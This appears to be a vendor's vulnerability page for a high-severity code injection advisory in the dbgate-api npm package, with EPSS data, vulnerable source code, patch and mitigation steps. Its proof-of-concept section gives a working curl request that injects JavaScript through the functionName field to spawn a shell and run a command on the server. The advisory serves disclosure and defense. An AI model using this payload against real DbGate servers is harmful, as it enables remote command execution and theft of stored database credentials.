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Not in CISA KEV
HIGH severity

GHSA-hv83-ggc4-v385

HIGH

GHSA-hv83-ggc4-v385 is a high-severity (CVSS 8.8) Code Injection vulnerability in dbgate-api. O3 Security confirms whether GHSA-hv83-ggc4-v385 is actually reachable in your code before you act, and blocks exploitation at runtime until you patch.

DbGate: Remote Code Execution via functionName injection in loadReader endpoint

Also known asCVE-2026-48017
Published
Jun 5, 2026
Updated
Jul 8, 2026
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed
Exploitation data as of Aug 9, 2026 · OSV.dev, NVD, FIRST.org (EPSS)

Exploitation Status

Proof-of-concept exploit code exists

  • CISA’s SSVC triage found public proof-of-concept exploit code for this CVE, though no confirmed active exploitation.
  • A successful exploit gives an attacker total control of the affected component, not partial access.

Exploitation and automatability from CISA’s SSVC triage for GHSA-hv83-ggc4-v385.

EPSS Exploitation Probability

via FIRST.org ↗
0.5%probability of exploitation in next 30 days
Lower Risk0.00%
Lower risk than most CVEs41th percentile — riskier than 41% of all scored CVEsHighest risk
0.01%0.34%0.68%1.01%0.5%0.5%0.5%Jul 26Aug 26Aug 26

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

How urgent is this, really

GHSA-hv83-ggc4-v385 plotted by exploitation likelihood (EPSS) against impact (CVSS). The shaded corner — EPSS 50%+ and CVSS 7.0+ — is where this CVE doesn't sit, though severity or exploitability alone can still warrant action.

Where this sits among everything scored

Of 357,322 CVEs with a current EPSS score, this one falls in the < 10% band (highlighted). Real counts from FIRST.org, not a sample — log-scaled since the landscape is heavily right-skewed.

Real-World Exposure

1 pkg affected

How broadly this vulnerability is actually deployed: weekly install volume shows current usage, and reverse-dependency count shows how many other packages break if it stays unpatched.

2other npm packages depend on this — each one inherits the vulnerability until it's patched upstream
dbgate-apinpm
1Kdownloads / week

Description

Summary

The POST /runners/load-reader endpoint in DbGate accepts a functionName parameter that is directly interpolated into a JavaScript code template without any sanitization or validation. An authenticated user (with basic access, no special permissions required) can inject arbitrary JavaScript code that executes on the server with full process privileges, bypassing the require=null sandbox restriction.

Details

The loadReader endpoint in packages/api/src/controllers/runners.js (line 353) takes a functionName parameter from the request body and passes it to compileShellApiFunctionName() which performs no sanitization:

Vulnerable code (permalink):

  loadReader_meta: true,
  async loadReader({ functionName, props }) {
    if (!platformInfo.isElectron) {
      if (props?.fileName && !checkSecureDirectories(props.fileName)) {
        return { errorMessage: 'DBGM-00289 Unallowed file' };
      }
    }
    const prefix = extractShellApiPlugins(functionName)
      .map(packageName => `// @require ${packageName}\n`)
      .join('');

    const promise = new Promise((resolve, reject) => {
      const runid = crypto.randomUUID();
      this.requests[runid] = { resolve, reject, exitOnStreamError: true };
      this.startCore(runid, loaderScriptTemplate(prefix, functionName, props, runid));
    });
    return promise;
  },

The loaderScriptTemplate at line 57-68 directly interpolates the compiled function name:

const loaderScriptTemplate = (prefix, functionName, props, runid) => `
${prefix}
const dbgateApi = require(process.env.DBGATE_API);
dbgateApi.initializeApiEnvironment();
${requirePluginsTemplate(extractShellApiPlugins(functionName, props))}
require=null;
async function run() {
const reader=await ${compileShellApiFunctionName(functionName)}(${JSON.stringify(props)});
const writer=await dbgateApi.collectorWriter({runid: '${runid}'});
await dbgateApi.copyStream(reader, writer);
}
dbgateApi.runScript(run);
`;

The compileShellApiFunctionName in packages/tools/src/packageTools.ts (line 30-35) performs no validation:

export function compileShellApiFunctionName(functionName) {
  const nsMatch = functionName.match(/^([^@]+)@([^@]+)/);
  if (nsMatch) {
    return `${_camelCase(nsMatch[2])}.shellApi.${nsMatch[1]}`;
  }
  return `dbgateApi.${functionName}`;
}

Two injection vectors:

  1. Without @: The entire functionName is appended after dbgateApi. without sanitization
  2. With @: The part before @ (nsMatch[1]) is appended after .shellApi. without sanitization (only the part after @ goes through _camelCase)

Although the script template sets require=null, the process global is still available. process.binding("spawn_sync") provides direct access to spawn child processes, completely bypassing the sandbox.

Compare with safe code in the same file (line 292):

  start_meta: true,
  async start({ script }, req) {
    // ...
    await testStandardPermission('run-shell-script', req);  // <-- Permission check!
    if (!platformInfo.allowShellScripting) {                 // <-- Platform check!
      return { errorMessage: 'DBGM-00286 Shell scripting is not allowed' };
    }
    // ...
  },

The start endpoint requires the run-shell-script permission and checks allowShellScripting. The loadReader endpoint has neither of these checks, making it a privilege escalation from any authenticated user to full RCE.

PoC

An authenticated user sends a POST request to /runners/load-reader with a crafted functionName:

# The malicious functionName breaks out of the expression and injects
# process.binding("spawn_sync") to execute arbitrary commands.
# The // at the end comments out the remaining template code.

curl -X POST http://TARGET:3000/runners/load-reader \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <JWT_TOKEN>" \
  -d '{
    "functionName": "toString();var __r=process.binding(\"spawn_sync\").spawn({file:\"/bin/sh\",args:[\"/bin/sh\",\"-c\",\"id > /tmp/dbgate-rce-proof\"],envPairs:[],stdio:[{type:\"pipe\",readable:true,writable:false},{type:\"pipe\",readable:false,writable:true},{type:\"pipe\",readable:false,writable:true}]});dbgateApi.toString//",
    "props": {}
  }'

This generates the following JavaScript that is forked as a child process:

const dbgateApi = require(process.env.DBGATE_API);
dbgateApi.initializeApiEnvironment();
require=null;
async function run() {
const reader=await dbgateApi.toString();var __r=process.binding("spawn_sync").spawn({file:"/bin/sh",args:["/bin/sh","-c","id > /tmp/dbgate-rce-proof"],envPairs:[],stdio:[{type:"pipe",readable:true,writable:false},{type:"pipe",readable:false,writable:true},{type:"pipe",readable:false,writable:true}]});dbgateApi.toString//({})
// ... rest of template
}
dbgateApi.runScript(run);

After the request, /tmp/dbgate-rce-proof contains the output of id, confirming arbitrary command execution.

A standalone PoC script is available at: reports/cve-hunting/pocs/dbgate/rce_loadreader_functionname_injection.py

Impact

An authenticated user with basic access (no admin role, no run-shell-script permission required) can:

  1. Execute arbitrary OS commands on the DbGate server with the privileges of the Node.js process
  2. Read/write any file accessible to the process
  3. Pivot to connected databases by reading connection credentials from DbGate's storage
  4. Compromise the host system - in Docker deployments, this typically means root access within the container

This is particularly severe because:

  • No special permissions are required beyond basic authentication
  • The require=null sandbox is completely bypassed via process.binding("spawn_sync")
  • The loadReader endpoint lacks the permission checks present on the start endpoint
  • DbGate is commonly deployed as a web-accessible database management tool

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
📦npmdbgate-apiall versions7.1.9

Detection & mitigation playbook

Open-source dependency
  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for dbgate-api. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

  2. Fix

    Update dbgate-api to 7.1.9 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-hv83-ggc4-v385 is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 pinpoints whether GHSA-hv83-ggc4-v385 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-hv83-ggc4-v385. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

### Summary The `POST /runners/load-reader` endpoint in DbGate accepts a `functionName` parameter that is directly interpolated into a JavaScript code template without any sanitization or validation. An authenticated user (with basic access, no special permissions required) can inject arbitrary JavaScript code that executes on the server with full process privileges, bypassing the `require=null` sandbox restriction. ### Details The `loadReader` endpoint in `packages/api/src/controllers/runners.js` (line 353) takes a `functionName` parameter from the request body and passes it to `compileShe
O3 Security · Impact-Aware SCA

Is GHSA-hv83-ggc4-v385 in your dependencies?

O3 detects GHSA-hv83-ggc4-v385 across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.